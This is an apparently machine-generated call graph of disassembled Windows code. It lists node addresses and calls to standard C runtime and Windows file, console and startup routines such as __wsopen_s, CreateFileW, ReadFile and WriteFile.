20260->20258 20262 1d68d4 20261->20262 20265 1d68e5 __InternalCxxFrameHandler __wsopen_s 20262->20265 20266 1d6980 20262->20266 20264 1d696b 20264->20004 20265->20004 20267 1d6ab9 20266->20267 20268 1d69ab 20266->20268 20269 1c2150 Concurrency::cancel_current_task 27 API calls 20267->20269 20270 1d69f2 20268->20270 20271 1d6a19 20268->20271 20276 1d6a03 __wsopen_s 20269->20276 20270->20267 20272 1d69fd 20270->20272 20273 1d70b4 27 API calls 20271->20273 20271->20276 20275 1d70b4 27 API calls 20272->20275 20273->20276 20274 1db98e 25 API calls 20277 1d6ac8 20274->20277 20275->20276 20276->20274 20281 1d6a81 __wsopen_s 20276->20281 20278 1d6afa 20277->20278 20279 1db98e 25 API calls 20277->20279 20278->20264 20280 1d6b1e 20279->20280 20281->20264 20283 1d673b 20282->20283 20293 1d6824 __wsopen_s 20282->20293 20284 1d68b1 20283->20284 20285 1d67aa 20283->20285 20286 1d67d1 20283->20286 20292 1d67bb __wsopen_s 20283->20292 20283->20293 20287 1c2150 Concurrency::cancel_current_task 27 API calls 20284->20287 20285->20284 20289 1d70b4 27 API calls 20285->20289 20290 1d70b4 27 API calls 20286->20290 20286->20292 20288 1d68bb 20287->20288 20289->20292 20290->20292 20291 1db98e 25 API calls 20291->20284 20292->20291 20292->20293 20293->19738 20295 1d65ae 20294->20295 20296 1d648b 20294->20296 20297 1c2150 Concurrency::cancel_current_task 27 API calls 20295->20297 20298 1d64fc 20296->20298 20299 1d64d2 20296->20299 20305 1d64e3 __wsopen_s 20297->20305 20301 1d70b4 27 API calls 20298->20301 20298->20305 20299->20295 20300 1d64dd 20299->20300 20303 1d70b4 27 API calls 20300->20303 20301->20305 20302 1db98e 25 API calls 20304 1d65bd 20302->20304 20303->20305 20305->20302 20306 1d656c __wsopen_s 20305->20306 20306->19740 20307->19771 20308 1dd15f 20313 1dcf35 20308->20313 20311 1dd19e 20315 1dcf54 20313->20315 20314 1dcf7c 20320 1dd09c 20314->20320 20333 1e1bd0 20314->20333 20315->20314 20316 1dcf67 20315->20316 20317 1db4a2 __dosmaperr 14 API calls 20316->20317 20318 1dcf6c 20317->20318 20319 1db97e __wsopen_s 25 API calls 20318->20319 20321 1dcf77 20319->20321 20320->20321 20322 1db4a2 __dosmaperr 14 API calls 20320->20322 20321->20311 20330 1e2341 20321->20330 20323 1dd14d 20322->20323 20324 1db97e __wsopen_s 25 API calls 20323->20324 20324->20321 20326 1dd0ec 20326->20320 20327 1e1bd0 37 API calls 20326->20327 20328 1dd10a 20327->20328 20328->20320 20329 1e1bd0 37 API calls 20328->20329 20329->20320 20365 1e1d06 20330->20365 20334 1e1bdf 20333->20334 20335 1e1c27 20333->20335 20337 1e1be5 20334->20337 20338 1e1c02 20334->20338 20347 1e1c3d 20335->20347 20339 1db4a2 __dosmaperr 14 API calls 20337->20339 20342 1db4a2 __dosmaperr 14 API calls 20338->20342 20346 1e1c20 20338->20346 20340 1e1bea 20339->20340 20341 1db97e __wsopen_s 25 API calls 20340->20341 20345 1e1bf5 20341->20345 20343 1e1c11 20342->20343 20344 1db97e __wsopen_s 25 API calls 20343->20344 20344->20345 20345->20326 20346->20326 20348 1e1c4d 20347->20348 20349 1e1c67 20347->20349 20350 1db4a2 __dosmaperr 14 API calls 20348->20350 20351 1e1c6f 20349->20351 20352 1e1c86 20349->20352 20355 1e1c52 20350->20355 20356 1db4a2 __dosmaperr 14 API calls 20351->20356 20353 1e1ca9 20352->20353 20354 1e1c92 20352->20354 20361 1da9fd __fassign 37 API calls 20353->20361 20363 1e1c5d 20353->20363 20357 1db4a2 __dosmaperr 14 API calls 20354->20357 20358 1db97e __wsopen_s 25 API calls 20355->20358 20359 1e1c74 20356->20359 20360 1e1c97 20357->20360 20358->20363 20362 1db97e __wsopen_s 25 API calls 20359->20362 20364 1db97e __wsopen_s 25 API calls 20360->20364 20361->20363 20362->20363 20363->20345 20364->20363 20367 1e1d12 CallCatchBlock 20365->20367 20366 1e1d19 20368 1db4a2 __dosmaperr 14 API calls 20366->20368 20367->20366 20369 1e1d44 20367->20369 20370 1e1d1e 20368->20370 20376 1e22d3 20369->20376 20371 1db97e __wsopen_s 25 API calls 20370->20371 20375 1e1d28 20371->20375 20375->20311 20389 1daa80 20376->20389 20381 1e2309 20383 1e1d68 20381->20383 20384 1dd301 _free 14 API calls 20381->20384 20385 1e1d9b 20383->20385 20384->20383 20386 1e1da1 20385->20386 20388 1e1dc5 20385->20388 20926 1dec0a LeaveCriticalSection 20386->20926 20388->20375 20390 1da9fd __fassign 37 API calls 20389->20390 20391 1daa92 20390->20391 20393 1daaa4 20391->20393 20444 1de039 20391->20444 20394 1da9e0 20393->20394 20450 1da92e 20394->20450 20397 1e2361 20488 1e20af 20397->20488 20400 1e23ac 20506 1dec2d 20400->20506 20401 1e2393 20402 1db48f __dosmaperr 14 API calls 20401->20402 20416 1e2398 20402->20416 20405 1e23ba 20407 1db48f __dosmaperr 14 API calls 20405->20407 20406 1e23d1 20519 1e201a CreateFileW 20406->20519 20410 1e23bf 20407->20410 20409 1db4a2 __dosmaperr 14 API calls 20411 1e23a5 20409->20411 20412 1db4a2 __dosmaperr 14 API calls 20410->20412 20411->20381 20412->20416 20413 1e2487 GetFileType 20414 1e24d9 20413->20414 20415 1e2492 GetLastError 20413->20415 20521 1deb78 20414->20521 20418 1db46c __dosmaperr 14 API calls 20415->20418 20416->20409 20417 1e245c GetLastError 20420 1db46c __dosmaperr 14 API calls 20417->20420 20421 1e24a0 CloseHandle 20418->20421 20419 1e240a 20419->20413 20419->20417 20520 1e201a CreateFileW 20419->20520 20420->20416 20421->20416 20423 1e24c9 20421->20423 20426 1db4a2 __dosmaperr 14 API calls 20423->20426 20425 1e244f 20425->20413 20425->20417 20428 1e24ce 20426->20428 20428->20416 20429 1e2546 20433 1e254d 20429->20433 20560 1e1dc7 20429->20560 20545 1dd454 20433->20545 20434 1e2589 20434->20411 20436 1e2605 CloseHandle 20434->20436 20586 1e201a CreateFileW 20436->20586 20438 1e2630 20439 1e263a GetLastError 20438->20439 20443 1e2554 20438->20443 20440 1db46c __dosmaperr 14 API calls 20439->20440 20441 1e2646 20440->20441 20587 1ded40 20441->20587 20443->20411 20447 1dde44 20444->20447 20448 1ddf73 _unexpected 5 API calls 20447->20448 20449 1dde5a 20448->20449 20449->20393 20451 1da93c 20450->20451 20452 1da956 20450->20452 20468 1daabf 20451->20468 20454 1da95d 20452->20454 20455 1da97c 20452->20455 20456 1da946 20454->20456 20472 1daad9 20454->20472 20457 1dd838 __fassign MultiByteToWideChar 20455->20457 20456->20381 20456->20397 20459 1da98b 20457->20459 20460 1da992 GetLastError 20459->20460 20462 1da9b8 20459->20462 20464 1daad9 __wsopen_s 15 API calls 20459->20464 20477 1db46c 20460->20477 20462->20456 20465 1dd838 __fassign MultiByteToWideChar 20462->20465 20464->20462 20467 1da9cf 20465->20467 20466 1db4a2 __dosmaperr 14 API calls 20466->20456 20467->20456 20467->20460 20469 1daaca 20468->20469 20470 1daad2 20468->20470 20471 1dd301 _free 14 API calls 20469->20471 20470->20456 20471->20470 20473 1daabf __wsopen_s 14 API calls 20472->20473 20474 1daae7 20473->20474 20482 1dab18 20474->20482 20485 1db48f 20477->20485 20479 1db477 __dosmaperr 20480 1db4a2 __dosmaperr 14 API calls 20479->20480 20481 1da99e 20480->20481 20481->20466 20483 1dd7ea __wsopen_s 15 API calls 20482->20483 20484 1daaf8 20483->20484 20484->20456 20486 1ddd49 __dosmaperr 14 API calls 20485->20486 20487 1db494 20486->20487 20487->20479 20489 1e20ea 20488->20489 20490 1e20d0 20488->20490 20596 1e203f 20489->20596 20490->20489 20492 1db4a2 __dosmaperr 14 API calls 20490->20492 20493 1e20df 20492->20493 20494 1db97e __wsopen_s 25 API calls 20493->20494 20494->20489 20495 1e2122 20496 1e2151 20495->20496 20498 1db4a2 __dosmaperr 14 API calls 20495->20498 20499 1e21a4 20496->20499 20603 1dc721 20496->20603 20501 1e2146 20498->20501 20499->20400 20499->20401 20500 1e219f 20500->20499 20502 1e221c 20500->20502 20503 1db97e __wsopen_s 25 API calls 20501->20503 20504 1db9ab __wsopen_s 11 API calls 20502->20504 20503->20496 20505 1e2228 20504->20505 20507 1dec39 CallCatchBlock 20506->20507 20610 1dcc03 EnterCriticalSection 20507->20610 20509 1dec40 20511 1dec65 20509->20511 20515 1decd4 EnterCriticalSection 20509->20515 20517 1dec87 20509->20517 20614 1dea07 20511->20614 20516 1dece1 LeaveCriticalSection 20515->20516 20515->20517 20516->20509 20611 1ded37 20517->20611 20519->20419 20520->20425 20522 1deb87 20521->20522 20523 1debf0 20521->20523 20522->20523 20529 1debad __wsopen_s 20522->20529 20524 1db4a2 __dosmaperr 14 API calls 20523->20524 20525 1debf5 20524->20525 20526 1db48f __dosmaperr 14 API calls 20525->20526 20527 1debdd 20526->20527 20527->20429 20530 1e2229 20527->20530 20528 1debd7 SetStdHandle 20528->20527 20529->20527 20529->20528 20531 1e2283 20530->20531 20532 1e2251 20530->20532 20531->20429 20532->20531 20628 1e571e 20532->20628 20535 1e2287 20631 1e52f2 20535->20631 20536 1e2271 20537 1db48f __dosmaperr 14 API calls 20536->20537 20539 1e2276 20537->20539 20539->20531 20542 1db4a2 __dosmaperr 14 API calls 20539->20542 20541 1e571e __wsopen_s 27 API calls 20541->20539 20542->20531 20544 1e22af 20544->20539 20544->20541 20546 1dedd1 __wsopen_s 25 API calls 20545->20546 20549 1dd464 20546->20549 20547 1dd46a 20548 1ded40 __wsopen_s 15 API calls 20547->20548 20552 1dd4c2 20548->20552 20549->20547 20550 1dd49c 20549->20550 20553 1dedd1 __wsopen_s 25 API calls 20549->20553 20550->20547 20551 1dedd1 __wsopen_s 25 API calls 20550->20551 20554 1dd4a8 CloseHandle 20551->20554 20555 1dd4e4 20552->20555 20558 1db46c __dosmaperr 14 API calls 20552->20558 20556 1dd493 20553->20556 20554->20547 20557 1dd4b4 GetLastError 20554->20557 20555->20443 20559 1dedd1 __wsopen_s 25 API calls 20556->20559 20557->20547 20558->20555 20559->20550 20561 1e1f53 20560->20561 20562 1e1df7 20560->20562 20561->20433 20561->20434 20563 1dc721 __wsopen_s 25 API calls 20562->20563 20569 1e1e17 20562->20569 20564 1e1e0e 20563->20564 20565 1e200f 20564->20565 20564->20569 20566 1db9ab __wsopen_s 11 API calls 20565->20566 20567 1e2019 20566->20567 20568 1e52f2 __wsopen_s 37 API calls 20575 1e1ef0 20568->20575 20569->20561 20570 1e1ecb 20569->20570 20571 1e571e __wsopen_s 27 API calls 20569->20571 20570->20561 20570->20568 20574 1e1f1e 20570->20574 20584 1e1f4e 20570->20584 20572 1e1f32 20571->20572 20572->20574 20576 1e571e __wsopen_s 27 API calls 20572->20576 20573 1db4a2 __dosmaperr 14 API calls 20573->20561 20574->20561 20574->20584 20896 1e2f23 20574->20896 20575->20574 20577 1e1f6f 20575->20577 20578 1e1f7c 20575->20578 20579 1e1f9e 20575->20579 20575->20584 20576->20570 20581 1db4a2 __dosmaperr 14 API calls 20577->20581 20578->20579 20582 1e1f83 20578->20582 20580 1e571e __wsopen_s 27 API calls 20579->20580 20580->20574 20581->20584 20585 1e571e __wsopen_s 27 API calls 20582->20585 20584->20573 20585->20574 20586->20438 20588 1dedb6 20587->20588 20591 1ded4f 20587->20591 20589 1db4a2 __dosmaperr 14 API calls 20588->20589 20590 1dedbb 20589->20590 20592 1db48f __dosmaperr 14 API calls 20590->20592 20591->20588 20595 1ded79 __wsopen_s 20591->20595 20593 1deda6 20592->20593 20593->20443 20594 1deda0 SetStdHandle 20594->20593 20595->20593 20595->20594 20597 1e2057 20596->20597 20598 1e2072 20597->20598 20599 1db4a2 __dosmaperr 14 API calls 20597->20599 20598->20495 20600 1e2096 20599->20600 20601 1db97e __wsopen_s 25 API calls 20600->20601 20602 1e20a1 20601->20602 20602->20495 20604 1dc72d 20603->20604 20605 1dc742 20603->20605 20606 1db4a2 __dosmaperr 14 API calls 20604->20606 20605->20500 20607 1dc732 20606->20607 20608 1db97e __wsopen_s 25 API calls 20607->20608 20609 1dc73d 20608->20609 20609->20500 20610->20509 20622 1dcc4b LeaveCriticalSection 20611->20622 20613 1deca7 20613->20405 20613->20406 20615 1df5d6 _unexpected 14 API calls 20614->20615 20616 1dea19 20615->20616 20620 1dea26 20616->20620 20623 1de1b4 20616->20623 20617 1dd301 _free 14 API calls 20619 1dea7b 20617->20619 20619->20517 20621 1deb55 EnterCriticalSection 20619->20621 20620->20617 20621->20517 20622->20613 20624 1ddf73 _unexpected 5 API calls 20623->20624 20625 1de1d0 20624->20625 20626 1de1ee InitializeCriticalSectionAndSpinCount 20625->20626 20627 1de1d9 20625->20627 20626->20627 20627->20616 20729 1e56a2 20628->20729 20632 1e531c 20631->20632 20633 1e5304 20631->20633 20634 1e5683 20632->20634 20638 1e535c 20632->20638 20635 1db48f __dosmaperr 14 API calls 20633->20635 20637 1db48f __dosmaperr 14 API calls 20634->20637 20636 1e5309 20635->20636 20639 1db4a2 __dosmaperr 14 API calls 20636->20639 20640 1e5688 20637->20640 20642 1e5367 20638->20642 20643 1e2299 20638->20643 20649 1e5396 20638->20649 20639->20643 20641 1db4a2 __dosmaperr 14 API calls 20640->20641 20644 1e5374 20641->20644 20645 1db48f __dosmaperr 14 API calls 20642->20645 20643->20544 20694 1e4c7e 20643->20694 20647 1db97e __wsopen_s 25 API calls 20644->20647 20646 1e536c 20645->20646 20648 1db4a2 __dosmaperr 14 API calls 20646->20648 20647->20643 20648->20644 20650 1e53af 20649->20650 20651 1e53ca 20649->20651 20652 1e5406 20649->20652 20650->20651 20685 1e53b4 20650->20685 20653 1db48f __dosmaperr 14 API calls 20651->20653 20655 1dd7ea __wsopen_s 15 API calls 20652->20655 20654 1e53cf 20653->20654 20656 1db4a2 __dosmaperr 14 API calls 20654->20656 20658 1e541d 20655->20658 20659 1e53d6 20656->20659 20661 1dd301 _free 14 API calls 20658->20661 20662 1db97e __wsopen_s 25 API calls 20659->20662 20660 1e555d 20663 1e55d3 20660->20663 20666 1e5576 GetConsoleMode 20660->20666 20664 1e5426 20661->20664 20693 1e53e1 __wsopen_s 20662->20693 20665 1e55d7 ReadFile 20663->20665 20667 1dd301 _free 14 API calls 20664->20667 20669 1e564b GetLastError 20665->20669 20670 1e55f1 20665->20670 20666->20663 20671 1e5587 20666->20671 20668 1e542d 20667->20668 20672 1e5437 20668->20672 20673 1e5452 20668->20673 20674 1e5658 20669->20674 20682 1e55af 20669->20682 20670->20669 20680 1e55c8 20670->20680 20671->20665 20675 1e558d ReadConsoleW 20671->20675 20677 1db4a2 __dosmaperr 14 API calls 20672->20677 20679 1e571e __wsopen_s 27 API calls 20673->20679 20678 1db4a2 __dosmaperr 14 API calls 20674->20678 20675->20680 20681 1e55a9 GetLastError 20675->20681 20676 1dd301 _free 14 API calls 20676->20643 20683 1e543c 20677->20683 20684 1e565d 20678->20684 20679->20685 20689 1e562d 20680->20689 20690 1e5616 20680->20690 20680->20693 20681->20682 20686 1db46c __dosmaperr 14 API calls 20682->20686 20682->20693 20687 1db48f __dosmaperr 14 API calls 20683->20687 20688 1db48f __dosmaperr 14 API calls 20684->20688 20751 1e3fad 20685->20751 20686->20693 20687->20693 20688->20693 20689->20693 20773 1e4f4f 20689->20773 20760 1e5120 20690->20760 20693->20676 20783 1e4c31 20694->20783 20696 1e4dcd 20697 1db4a2 __dosmaperr 14 API calls 20696->20697 20728 1e4d53 20697->20728 20699 1e4d7f 20700 1e571e __wsopen_s 27 API calls 20699->20700 20699->20728 20704 1e4d97 20700->20704 20701 1e4cd4 20702 1df5d6 _unexpected 14 API calls 20701->20702 20705 1e4ce0 20702->20705 20703 1e571e __wsopen_s 27 API calls 20706 1e4de4 20703->20706 20704->20696 20709 1dedd1 __wsopen_s 25 API calls 20704->20709 20707 1e4ce8 20705->20707 20708 1e4cf5 __wsopen_s 20705->20708 20706->20544 20710 1db4a2 __dosmaperr 14 API calls 20707->20710 20721 1e4d5a 20708->20721 20723 1e4d44 __wsopen_s 20708->20723 20788 1e3015 20708->20788 20711 1e4da7 SetEndOfFile 20709->20711 20727 1e4ced 20710->20727 20712 1e4db3 20711->20712 20711->20728 20713 1db4a2 __dosmaperr 14 API calls 20712->20713 20714 1e4db8 20713->20714 20716 1db48f __dosmaperr 14 API calls 20714->20716 20715 1db4a2 __dosmaperr 14 API calls 20717 1e4d74 20715->20717 20718 1e4dc3 GetLastError 20716->20718 20719 1dd301 _free 14 API calls 20717->20719 20718->20696 20719->20728 20722 1db48f __dosmaperr 14 API calls 20721->20722 20724 1e4d5f 20722->20724 20726 1dd301 _free 14 API calls 20723->20726 20725 1db4a2 __dosmaperr 14 API calls 20724->20725 20724->20727 20725->20727 20726->20728 20727->20715 20728->20703 20738 1dedd1 20729->20738 20731 1e56b4 20732 1e56bc 20731->20732 20733 1e56cd SetFilePointerEx 20731->20733 20734 1db4a2 __dosmaperr 14 API calls 20732->20734 20735 1e2261 20733->20735 20736 1e56e5 GetLastError 20733->20736 20734->20735 20735->20535 20735->20536 20737 1db46c __dosmaperr 14 API calls 20736->20737 20737->20735 20739 1dedde 20738->20739 20740 1dedf3 20738->20740 20741 1db48f __dosmaperr 14 API calls 20739->20741 20742 1db48f __dosmaperr 14 API calls 20740->20742 20745 1dee18 20740->20745 20743 1dede3 20741->20743 20746 1dee23 20742->20746 20744 1db4a2 __dosmaperr 14 API calls 20743->20744 20747 1dedeb 20744->20747 20745->20731 20748 1db4a2 __dosmaperr 14 API calls 20746->20748 20747->20731 20749 1dee2b 20748->20749 20750 1db97e __wsopen_s 25 API calls 20749->20750 20750->20747 20752 1e3fba 20751->20752 20754 1e3fc7 20751->20754 20753 1db4a2 __dosmaperr 14 API calls 20752->20753 20755 1e3fbf 20753->20755 20756 1e3fd3 20754->20756 20757 1db4a2 __dosmaperr 14 API calls 20754->20757 20755->20660 20756->20660 20758 1e3ff4 20757->20758 20759 1db97e __wsopen_s 25 API calls 20758->20759 20759->20755 20778 1e4dee 20760->20778 20762 1dd838 __fassign MultiByteToWideChar 20764 1e5234 20762->20764 20767 1e523d GetLastError 20764->20767 20770 1e5168 20764->20770 20765 1e51c2 20771 1e517c 20765->20771 20772 1e571e __wsopen_s 27 API calls 20765->20772 20766 1e51b2 20768 1db4a2 __dosmaperr 14 API calls 20766->20768 20769 1db46c __dosmaperr 14 API calls 20767->20769 20768->20770 20769->20770 20770->20693 20771->20762 20772->20771 20775 1e4f8a 20773->20775 20774 1e50f2 20774->20693 20775->20774 20776 1e501b ReadFile 20775->20776 20777 1e571e __wsopen_s 27 API calls 20775->20777 20776->20775 20777->20775 20780 1e4e22 20778->20780 20779 1e4f29 20779->20765 20779->20766 20779->20770 20779->20771 20780->20779 20781 1e4e91 ReadFile 20780->20781 20782 1e571e __wsopen_s 27 API calls 20780->20782 20781->20780 20782->20780 20784 1e571e __wsopen_s 27 API calls 20783->20784 20785 1e4c4a 20784->20785 20786 1e571e __wsopen_s 27 API calls 20785->20786 20787 1e4c59 20786->20787 20787->20696 20787->20699 20787->20701 20789 1e3037 20788->20789 20825 1e3053 20788->20825 20790 1e303b 20789->20790 20793 1e308b 20789->20793 20791 1db48f __dosmaperr 14 API calls 20790->20791 20792 1e3040 20791->20792 20794 1db4a2 __dosmaperr 14 API calls 20792->20794 20795 1e309e 20793->20795 20797 1e571e __wsopen_s 27 API calls 20793->20797 20796 1e3048 20794->20796 20830 1e2bbc 20795->20830 20799 1db97e __wsopen_s 25 API calls 20796->20799 20797->20795 20799->20825 20801 1e30b4 20803 1e30dd 20801->20803 20804 1e30b8 20801->20804 20802 1e30f3 20805 1e314c WriteFile 20802->20805 20806 1e3107 20802->20806 20842 1e27aa GetConsoleCP 20803->20842 20813 1e30d3 20804->20813 20837 1e2b54 20804->20837 20808 1e3170 GetLastError 20805->20808 20805->20813 20809 1e313c 20806->20809 20810 1e3112 20806->20810 20808->20813 20870 1e2c2d 20809->20870 20814 1e312c 20810->20814 20815 1e3117 20810->20815 20817 1e3196 20813->20817 20818 1e31c0 20813->20818 20813->20825 20862 1e2df1 20814->20862 20815->20813 20855 1e2d08 20815->20855 20820 1e319d 20817->20820 20821 1e31b4 20817->20821 20823 1db4a2 __dosmaperr 14 API calls 20818->20823 20818->20825 20824 1db4a2 __dosmaperr 14 API calls 20820->20824 20822 1db46c __dosmaperr 14 API calls 20821->20822 20822->20825 20826 1e31d8 20823->20826 20827 1e31a2 20824->20827 20825->20708 20829 1db48f __dosmaperr 14 API calls 20826->20829 20828 1db48f __dosmaperr 14 API calls 20827->20828 20828->20825 20829->20825 20831 1e3fad __wsopen_s 25 API calls 20830->20831 20832 1e2bcd 20831->20832 20833 1e2c23 20832->20833 20834 1ddbf2 _unexpected 37 API calls 20832->20834 20833->20801 20833->20802 20835 1e2bf0 20834->20835 20835->20833 20836 1e2c0a GetConsoleMode 20835->20836 20836->20833 20838 1e2b76 20837->20838 20841 1e2bab 20837->20841 20839 1e2bad GetLastError 20838->20839 20840 1e5739 5 API calls __wsopen_s 20838->20840 20838->20841 20839->20841 20840->20838 20841->20813 20843 1da9fd __fassign 37 API calls 20842->20843 20851 1e2806 __wsopen_s 20843->20851 20844 1d6cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 20846 1e2b52 20844->20846 20845 1de370 __wsopen_s 37 API calls 20845->20851 20846->20813 20847 1df40c 38 API calls __fassign 20847->20851 20848 1e2aa6 20848->20844 20851->20845 20851->20847 20851->20848 20852 1e2a29 WriteFile 20851->20852 20854 1e2a61 WriteFile 20851->20854 20877 1e3e93 20851->20877 20887 1e0623 20851->20887 20852->20851 20853 1e2b22 GetLastError 20852->20853 20853->20848 20854->20851 20854->20853 20859 1e2d17 __wsopen_s 20855->20859 20856 1e2dd6 20857 1d6cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 20856->20857 20861 1e2def 20857->20861 20858 1e2d8c WriteFile 20858->20859 20860 1e2dd8 GetLastError 20858->20860 20859->20856 20859->20858 20860->20856 20861->20813 20869 1e2e00 __wsopen_s 20862->20869 20863 1e2f08 20864 1d6cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 20863->20864 20865 1e2f21 20864->20865 20865->20813 20866 1e0623 __wsopen_s WideCharToMultiByte 20866->20869 20867 1e2f0a GetLastError 20867->20863 20868 1e2ebf WriteFile 20868->20867 20868->20869 20869->20863 20869->20866 20869->20867 20869->20868 20873 1e2c3c __wsopen_s 20870->20873 20871 1e2ced 20872 1d6cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 20871->20872 20874 1e2d06 20872->20874 20873->20871 20875 1e2cac WriteFile 20873->20875 20874->20813 20875->20873 20876 1e2cef GetLastError 20875->20876 20876->20871 20878 1e3eac __wsopen_s 20877->20878 20881 1e3f48 __wsopen_s 20877->20881 20883 1e3f33 20878->20883 20886 1e3f1e 20878->20886 20890 1e5926 20878->20890 20880 1e5926 __fassign 19 API calls 20880->20881 20881->20880 20882 1e3f78 20881->20882 20881->20886 20884 1db4a2 __dosmaperr 14 API calls 20882->20884 20885 1db4a2 __dosmaperr 14 API calls 20883->20885 20884->20886 20885->20886 20886->20851 20889 1e063c WideCharToMultiByte 20887->20889 20889->20851 20895 1e594d 20890->20895 20891 1d6cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 20892 1e5acb 20891->20892 20892->20878 20893 1e5972 20893->20891 20894 1e3f8e __fassign 14 API calls 20894->20893 20895->20893 20895->20894 20897 1e2f2f CallCatchBlock 20896->20897 20898 1e2f37 20897->20898 20903 1e2f4f 20897->20903 20899 1db48f __dosmaperr 14 API calls 20898->20899 20901 1e2f3c 20899->20901 20900 1e2fea 20902 1db48f __dosmaperr 14 API calls 20900->20902 20906 1db4a2 __dosmaperr 14 API calls 20901->20906 20904 1e2fef 20902->20904 20903->20900 20905 1e2f81 20903->20905 20907 1db4a2 __dosmaperr 14 API calls 20904->20907 20921 1deb55 EnterCriticalSection 20905->20921 20920 1e2f44 20906->20920 20909 1e2ff7 20907->20909 20911 1db97e __wsopen_s 25 API calls 20909->20911 20910 1e2f87 20912 1e2fb8 20910->20912 20913 1e2fa3 20910->20913 20911->20920 20915 1e3015 __wsopen_s 60 API calls 20912->20915 20914 1db4a2 __dosmaperr 14 API calls 20913->20914 20916 1e2fa8 20914->20916 20917 1e2fb3 20915->20917 20918 1db48f __dosmaperr 14 API calls 20916->20918 20922 1e2fe2 20917->20922 20918->20917 20920->20574 20921->20910 20925 1dec0a LeaveCriticalSection 20922->20925 20924 1e2fe8 20924->20920 20925->20924 20926->20388 20927 1d7434 20928 1d7440 CallCatchBlock 20927->20928 20953 1d715a 20928->20953 20930 1d7447 20931 1d75a0 20930->20931 20940 1d7471 ___scrt_is_nonwritable_in_current_image IsInExceptionSpec ___scrt_release_startup_lock 20930->20940 21006 1d75c0 IsProcessorFeaturePresent 20931->21006 20933 1d75a7 21010 1da74f 20933->21010 20936 1da713 IsInExceptionSpec 23 API calls 20937 1d75b5 20936->20937 20938 1d7490 20939 1d7511 20961 1dc17d 20939->20961 20940->20938 20940->20939 20986 1da729 20940->20986 20943 1d7517 20965 1d5530 20943->20965 20954 1d7163 20953->20954 21013 1d77ad IsProcessorFeaturePresent 20954->21013 20958 1d7174 20959 1d7178 20958->20959 21023 1d81be 20958->21023 20959->20930 20962 1dc186 20961->20962 20963 1dc18b 20961->20963 21084 1dbee1 20962->21084 20963->20943 21298 1c9c70 20965->21298 20967 1d553e 21326 1c9790 20967->21326 20987 1dc9bd CallCatchBlock 20986->20987 20988 1da73f _unexpected 20986->20988 20989 1ddbf2 _unexpected 37 API calls 20987->20989 20988->20939 20991 1dc9ce 20989->20991 20990 1dca58 IsInExceptionSpec 37 API calls 20992 1dc9f8 20990->20992 20991->20990 20993 1db4a2 __dosmaperr 14 API calls 20992->20993 20996 1dca37 20992->20996 20994 1dca2d 20993->20994 20995 1db97e __wsopen_s 25 API calls 20994->20995 20995->20996 20996->20939 21007 1d75d5 ___scrt_fastfail 21006->21007 21008 1d7680 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 21007->21008 21009 1d76cb ___scrt_fastfail 21008->21009 21009->20933 21011 1da5ed IsInExceptionSpec 23 API calls 21010->21011 21012 1d75ad 21011->21012 21012->20936 21014 1d716f 21013->21014 21015 1d819f 21014->21015 21029 1d9409 21015->21029 21018 1d81a8 21018->20958 21020 1d81b0 21021 1d81bb 21020->21021 21043 1d9445 21020->21043 21021->20958 21024 1d81c7 21023->21024 21025 1d81d1 21023->21025 21026 1d8605 ___vcrt_uninitialize_ptd 6 API calls 21024->21026 21025->20959 21027 1d81cc 21026->21027 21028 1d9445 ___vcrt_uninitialize_locks DeleteCriticalSection 21027->21028 21028->21025 21030 1d9412 21029->21030 21032 1d943b 21030->21032 21033 1d81a4 21030->21033 21047 1d97cb 21030->21047 21034 1d9445 ___vcrt_uninitialize_locks DeleteCriticalSection 21032->21034 21033->21018 21035 1d85d2 21033->21035 21034->21033 21065 1d96dc 21035->21065 21038 1d85e7 21038->21020 21041 1d8602 21041->21020 21044 1d946f 21043->21044 21045 1d9450 21043->21045 21044->21018 21046 1d945a DeleteCriticalSection 21045->21046 21046->21044 21046->21046 21052 1d9693 21047->21052 21050 1d9803 InitializeCriticalSectionAndSpinCount 21051 1d97ee 21050->21051 21051->21030 21053 1d96ab 21052->21053 21057 1d96ce 21052->21057 21053->21057 21058 1d95e7 21053->21058 21056 1d96c0 GetProcAddress 21056->21057 21057->21050 21057->21051 21061 1d95f6 ___vcrt_FlsFree 21058->21061 21059 1d9688 21059->21056 21059->21057 21060 1d960f LoadLibraryExW 21060->21061 21062 1d962a GetLastError 21060->21062 21061->21059 21061->21060 21063 1d9671 FreeLibrary 21061->21063 21064 1d9649 LoadLibraryExW 21061->21064 21062->21061 21063->21061 21064->21061 21066 1d9693 ___vcrt_FlsFree 5 API calls 21065->21066 21067 1d96f6 21066->21067 21068 1d970f TlsAlloc 21067->21068 21069 1d85dc 21067->21069 21069->21038 21070 1d978d 21069->21070 21071 1d9693 ___vcrt_FlsFree 5 API calls 21070->21071 21072 1d97a7 21071->21072 21073 1d97c2 TlsSetValue 21072->21073 21074 1d85f5 21072->21074 21073->21074 21074->21041 21075 1d8605 21074->21075 21076 1d8615 21075->21076 21077 1d860f 21075->21077 21076->21038 21079 1d9717 21077->21079 21080 1d9693 ___vcrt_FlsFree 5 API calls 21079->21080 21081 1d9731 21080->21081 21082 1d9749 TlsFree 21081->21082 21083 1d973d 21081->21083 21082->21083 21083->21076 21085 1dbeea 21084->21085 21088 1dbf00 21084->21088 21085->21088 21090 1dbf0d 21085->21090 21087 1dbef7 21087->21088 21103 1dc05f 21087->21103 21088->20963 21091 1dbf19 21090->21091 21092 1dbf16 21090->21092 21111 1e0366 21091->21111 21092->21087 21097 1dbf2b 21100 1dd301 _free 14 API calls 21097->21100 21101 1dbf5a 21100->21101 21101->21087 21102 1dd301 _free 14 API calls 21102->21097 21104 1dc0d0 21103->21104 21109 1dc06e 21103->21109 21104->21088 21105 1df5d6 _unexpected 14 API calls 21105->21109 21106 1dc0d4 21107 1dd301 _free 14 API calls 21106->21107 21107->21104 21108 1e0623 WideCharToMultiByte __wsopen_s 21108->21109 21109->21104 21109->21105 21109->21106 21109->21108 21110 1dd301 _free 14 API calls 21109->21110 21110->21109 